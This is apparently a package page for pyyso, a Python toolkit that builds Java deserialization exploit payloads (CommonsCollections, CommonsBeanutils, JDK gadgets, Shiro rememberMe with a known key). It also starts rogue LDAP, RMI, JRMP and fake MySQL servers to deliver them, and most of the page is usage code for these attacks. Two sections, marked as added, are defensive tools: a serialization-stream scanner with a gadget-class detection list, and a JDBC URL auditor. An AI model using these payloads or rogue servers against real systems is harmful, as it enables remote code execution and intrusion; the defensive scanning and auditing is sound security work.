A Java serialization tool written in Python
pyyso: a powerful Java serialization toolkit
What is it?
pyyso is a Python package that provides fast and flexible ways to generate Java serialized PoCs. It aims to be the fundamental high-level building block for vulnerability checking and research in Python. Additionally, it has the goal of becoming the most convenient and reliable toolkit implemented in Python for Java researchers.
Main Features
Here are just a few of the things that pyyso does well:
- Easy generation of Java serialized PoCs
- Powerful, flexible functionality to start an LDAP/RMI/JRMP/MySQL server to host Java serialized PoCs
- Communicates and collaborates with other Python packages
- Unlike a Java client, it cannot itself be exploited back over RMI
pyyso has implemented:
- URLDNS gadget
- CommonsCollections1-7 gadgets
- JDK7u21 gadget
- JDK8u21 gadget
- CommonsBeanutils1 1.8.3 (no CommonsCollections dependency)
- CommonsBeanutils1 1.9.2
- Shiro-550 rememberMe deserialization
- Java class embedding a command
- LDAP server hosting Java serialized PoCs
- LDAP server hosting a Java remote reference factory
- RMI server
- BeanFactory bypass for high JDK versions
- JRMP server
- JRMPClient gadget
- Fake MySQL server for JDBC deserialization
Where to get it
The source code is currently hosted on GitHub at: https://github.com/cokeBeer/pyyso
Installation from sources
```shell
pip install pyyso
```
How to use
Basic usage
First import pyyso:
```python
import pyyso
```
To generate a Java serialized PoC, use:
```python
pyyso.urldns("https://x.dnslog.com")  # returns Java serialized data of URLDNS in bytes
pyyso.cc1("touch /tmp/1")  # returns Java serialized data of CommonsCollections1 in bytes
pyyso.cc2("touch /tmp/1")  # returns Java serialized data of CommonsCollections2 in bytes
pyyso.jdk7u21("touch /tmp/1")  # returns Java serialized data of JDK7u21 in bytes
pyyso.jdk8u20("touch /tmp/1")  # returns Java serialized data of JDK8u20 in bytes
pyyso.jrmpclient("127.0.0.1", 80)  # returns Java serialized data of JRMPClient in bytes
pyyso.cb1v183("touch /tmp/1")  # returns Java serialized data of CommonsBeanutils1 1.8.3 (no cc) in bytes
```
To generate a Java class embedding a command, use:
```python
pyyso.clazz("touch /tmp/1")  # returns a Java class embedding the command, in bytes
```
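The functions above produce Java serialization streams; on the receiving side, those same streams are what a defender has to recognize. The following example is added here and is not part of pyyso: it checks input for the Java serialization header (0xACED0005), decodes the base64 form that typically travels in cookies or parameters (prefix `rO0AB`), walks the stream for TC_CLASSDESC records to collect class names, and flags classes characteristic of the gadget families listed above. The suspicious-class table, the name heuristic and the sample streams are assumptions of this example; the samples are constructed fragments shaped like real streams, not pyyso output or complete objects.

```python
import base64
import re
import struct
from dataclasses import dataclass, field
from typing import Dict, List

# Java serialization stream header: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5).
STREAM_HEADER = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72

# Classes characteristic of the gadget chains pyyso generates (URLDNS, CommonsCollections,
# CommonsBeanutils, JRMPClient). This table is an assumption of the example; seeing one of
# these names in an inbound stream is a strong alert signal, not proof of exploitation.
SUSPICIOUS_CLASSES: Dict[str, str] = {
    "java.net.URL": "URLDNS-style DNS callback",
    "org.apache.commons.collections.functors.InvokerTransformer": "CommonsCollections transformer chain",
    "org.apache.commons.collections.functors.ChainedTransformer": "CommonsCollections transformer chain",
    "org.apache.commons.collections4.functors.InvokerTransformer": "CommonsCollections4 transformer chain",
    "org.apache.commons.beanutils.BeanComparator": "CommonsBeanutils1 chain",
    "sun.rmi.server.UnicastRef": "JRMPClient outbound JRMP connection",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl": "TemplatesImpl bytecode loading",
}

# A Java binary class name: optional array prefix '[' then identifier chars, '.', '$', ';'.
CLASS_NAME_RE = re.compile(rb"^\[*[A-Za-z_$][A-Za-z0-9_$.;]*$")


@dataclass
class ScanResult:
    is_java_serialized: bool
    class_names: List[str] = field(default_factory=list)
    findings: Dict[str, str] = field(default_factory=dict)


def normalize(data: bytes) -> bytes:
    """Return raw stream bytes; a base64 stream (prefix 'rO0AB', e.g. from a cookie) is decoded."""
    stripped = data.strip()
    if stripped.startswith(b"rO0AB"):
        try:
            return base64.b64decode(stripped)
        except ValueError:  # binascii.Error is a ValueError subclass
            return data
    return data


def extract_class_names(data: bytes) -> List[str]:
    """Heuristic walk: each TC_CLASSDESC (0x72) is followed by a modified-UTF class name
    (2-byte big-endian length + bytes). A 0x72 byte ('r') inside a name or string is rejected
    because the two bytes after it do not form a plausible length (<= 255) plus a valid name."""
    names: List[str] = []
    i = 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            candidate = data[i + 3:i + 3 + length]
            if 0 < length <= 255 and len(candidate) == length and CLASS_NAME_RE.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def scan(data: bytes) -> ScanResult:
    """Classify input: not a Java stream, a Java stream, or a Java stream carrying gadget classes."""
    raw = normalize(data)
    if not raw.startswith(STREAM_HEADER):
        return ScanResult(is_java_serialized=False)
    names = extract_class_names(raw)
    findings = {n: SUSPICIOUS_CLASSES[n] for n in names if n in SUSPICIOUS_CLASSES}
    return ScanResult(True, names, findings)


def _class_desc(name: str) -> bytes:
    """Constructed TC_CLASSDESC fragment (not pyyso output): class name, an 8-byte
    serialVersionUID of zero, SC_SERIALIZABLE flag, zero fields, TC_ENDBLOCKDATA, TC_NULL."""
    encoded = name.encode("ascii")
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded
            + b"\x00" * 8 + b"\x02" + b"\x00\x00" + b"\x78\x70")


# Constructed samples for the demonstration: shaped like real streams, but not complete objects.
SAMPLE_URLDNS_LIKE = (STREAM_HEADER + bytes([TC_OBJECT])
                      + _class_desc("java.util.HashMap") + _class_desc("java.net.URL"))
SAMPLE_URLDNS_B64 = base64.b64encode(SAMPLE_URLDNS_LIKE)
SAMPLE_BENIGN = STREAM_HEADER + bytes([TC_OBJECT]) + _class_desc("java.util.ArrayList")

if __name__ == "__main__":
    for label, sample in (("urldns-like", SAMPLE_URLDNS_LIKE), ("base64", SAMPLE_URLDNS_B64), ("benign", SAMPLE_BENIGN)):
        result = scan(sample)
        print(label, result.class_names, result.findings)
```

Run over a cookie value, a request body or a file read from disk, `scan` returns the class names it saw and which of them match the gadget table, so the same function serves an inbound request filter and an after-the-fact log review. The walk is deliberately heuristic (it does not reconstruct objects), which keeps it safe to run on hostile input.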
Shiro
To encode a Shiro PoC, use:
```python
serobj = pyyso.cb1v183("touch /tmp/1")
pyyso.shiroEncode(serobj=serobj, key=b'kPH+bIxk5D2deZiIxcaaaA==')
```
LDAP
To start an LDAP server hosting Java serialized PoCs:
```python
serobj = pyyso.cc1("touch /tmp/1")
server = pyyso.LdapSerialized(serobj=serobj, ip="0.0.0.0", port=1389)
server.run()
```
This will start an LDAP server listening on 0.0.0.0:1389.
You can change the hosted Java serialized data with:
```python
server.serobj = pyyso.cc1("rm /tmp/2")
```
To start an LDAP server hosting a Java remote reference factory:
```python
server = pyyso.LdapRemoteRef(javaCodeBase="http://127.0.0.1:8088/", javaFactory="Evil", javaClassName="java.lang.String", ip="0.0.0.0", port=1389)
server.run()
```
This will start an LDAP server listening on 0.0.0.0:1389 that returns a remote reference pointing to http://127.0.0.1:8088/Evil.class.
JRMP
To start a JRMPListener:
```python
serobj = pyyso.cc1("open /tmp", jrmp=True)  # note the 'jrmp=True'!
server = pyyso.JRMPListener(serobj=serobj, ip="0.0.0.0", port=5151)
server.run()
```
This will start a JRMPListener listening on 0.0.0.0:5151.
When a jrmpclient gadget is deserialized on the victim's server, that server connects back to the JRMPListener.
The jrmpclient gadget should be made with:
```python
serobj = pyyso.jrmpclient(hostname="127.0.0.1", port=5151)
```
where hostname corresponds to the address the JRMPListener is hosted on.
RMI and bypass
To get a bypass PoC, use:
```python
serobj = pyyso.beanfactory("open /tmp", rmi=True)
```
To start an RMI server hosting the bypass PoC, use:
```python
serobj = pyyso.beanfactory("open /", rmi=True)  # note the 'rmi=True'!
server = pyyso.RMIServer(serobj=serobj, ip="0.0.0.0", port=1099, refip="0.0.0.0", refport=42155)
server.run()
```
A registry will listen on 0.0.0.0:1099 and a PoC provider server will listen on 0.0.0.0:42155.
MySQL
To start a MySQL server hosting a JDBC deserialization payload, use:
```python
serobj = pyyso.cc2("open /")
server = pyyso.MysqlServer(serobj=serobj, ip="0.0.0.0", port=3306)
server.run()
```
A fake MySQL server will listen on 0.0.0.0:3306 and wait for SHOW STATUS.
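A fake server of this kind only matters to a JDBC client whose connection string lets the server hand it Java objects. The following example is added here and is not part of pyyso: it audits a `jdbc:mysql://` URL for MySQL Connector/J properties that expose the client to a malicious server (`autoDeserialize`, combined with `ServerStatusDiffInterceptor`, is what turns the SHOW STATUS reply into a deserialization, and the LOCAL INFILE switches let a server request client files). The sample URLs are constructed, and taking the last occurrence of a repeated parameter as the effective one is an assumption of this example.

```python
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlparse

# Connector/J properties that let a malicious or spoofed MySQL server attack the client.
# Keys are lower-cased because Connector/J matches property names case-insensitively;
# each value is a predicate over the lower-cased parameter value.
DANGEROUS_PARAMS = {
    "autodeserialize": lambda v: v == "true",  # BLOB columns are deserialized as Java objects
    "queryinterceptors": lambda v: "serverstatusdiffinterceptor" in v,      # Connector/J 8.x property
    "statementinterceptors": lambda v: "serverstatusdiffinterceptor" in v,  # Connector/J 5.x property
    "allowloadlocalinfile": lambda v: v == "true",  # server may request arbitrary client-side files
    "allowurlinlocalinfile": lambda v: v == "true",
}


def parse_jdbc_mysql_url(url: str) -> Tuple[str, int, str, Dict[str, str]]:
    """Split jdbc:mysql://host:port/db?k=v into (host, port, database, lower-cased params)."""
    if not url.lower().startswith("jdbc:mysql://"):
        raise ValueError("not a plain jdbc:mysql:// URL")
    parsed = urlparse(url[len("jdbc:"):])  # mysql://host:port/db?k=v parses as an ordinary URL
    query = parse_qs(parsed.query, keep_blank_values=True)
    # Assumption of this example: when a parameter repeats, the last occurrence is effective.
    params = {k.lower(): v[-1].lower() for k, v in query.items()}
    return parsed.hostname or "", parsed.port or 3306, parsed.path.lstrip("/"), params


def audit_jdbc_url(url: str) -> List[str]:
    """Return the names of dangerous parameters that are actively enabled in the URL."""
    _, _, _, params = parse_jdbc_mysql_url(url)
    return [name for name, enabled in DANGEROUS_PARAMS.items()
            if name in params and enabled(params[name])]


# Constructed sample connection strings for the demonstration.
SAMPLE_SAFE_URL = "jdbc:mysql://db.internal:3306/app?useSSL=true&characterEncoding=utf8"
SAMPLE_UNSAFE_URL = ("jdbc:mysql://10.0.0.5:3306/app?autoDeserialize=true"
                     "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor")

if __name__ == "__main__":
    for url in (SAMPLE_SAFE_URL, SAMPLE_UNSAFE_URL):
        print(url, "->", audit_jdbc_url(url) or "ok")
```

The check is meant to run wherever connection strings are accepted from configuration or from users (a data-source admin page, a CI lint over application properties): a non-empty result means the client would trust a server-controlled value in a way the fake server above abuses, and the URL should be rejected.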
Support Options
Currently only some gadgets support the JRMP or RMI option, which can be enabled with rmi=True or jrmp=True.

Gadgets | Basic | jrmp option | rmi option
---|---|---|---
CC1-CC7 | ✅ | ✅ | ❌
CB1v192 | ✅ | ✅ | ❌
CB1v183 | ✅ | ✅ | ❌
JDK7u21 | ✅ | ✅ | ❌
beanfactory | ❌ | ❌ | ✅
others | ✅ | ❌ | ❌
License
Inspired by
https://github.com/frohoff/ysoserial
https://github.com/mbechler/marshalsec
File details
Details for the file pyyso-0.0.11.tar.gz.
File metadata
- Download URL: pyyso-0.0.11.tar.gz
- Upload date:
- Size: 21.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.0 CPython/3.9.9
File hashes

Algorithm | Hash digest
---|---
SHA256 | 2b0384de373d7823ffade18305df9fc01dc00192cea50f4d444f41b5838a50a1
MD5 | e8df22b7776eca50f9629de9f74678b0
BLAKE2b-256 | b7cac4f4dd0e2aceeee4585d90501ab624c40cbb71d5d54f6e30d60e062ec42a
File details
Details for the file pyyso-0.0.11-py3-none-any.whl.
File metadata
- Download URL: pyyso-0.0.11-py3-none-any.whl
- Upload date:
- Size: 40.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.0 CPython/3.9.9
File hashes

Algorithm | Hash digest
---|---
SHA256 | 6a35d0a6d9bc7fbe473520752f1b2cb5d98ba6619bb4f4a1841a62e4ee700976
MD5 | d4b86d0373e3e68c4d90056978e2d960
BLAKE2b-256 | 754149677522e95af7cb1ef3cd479d989b53f523ed1a1c7ca85f6c06532a2a51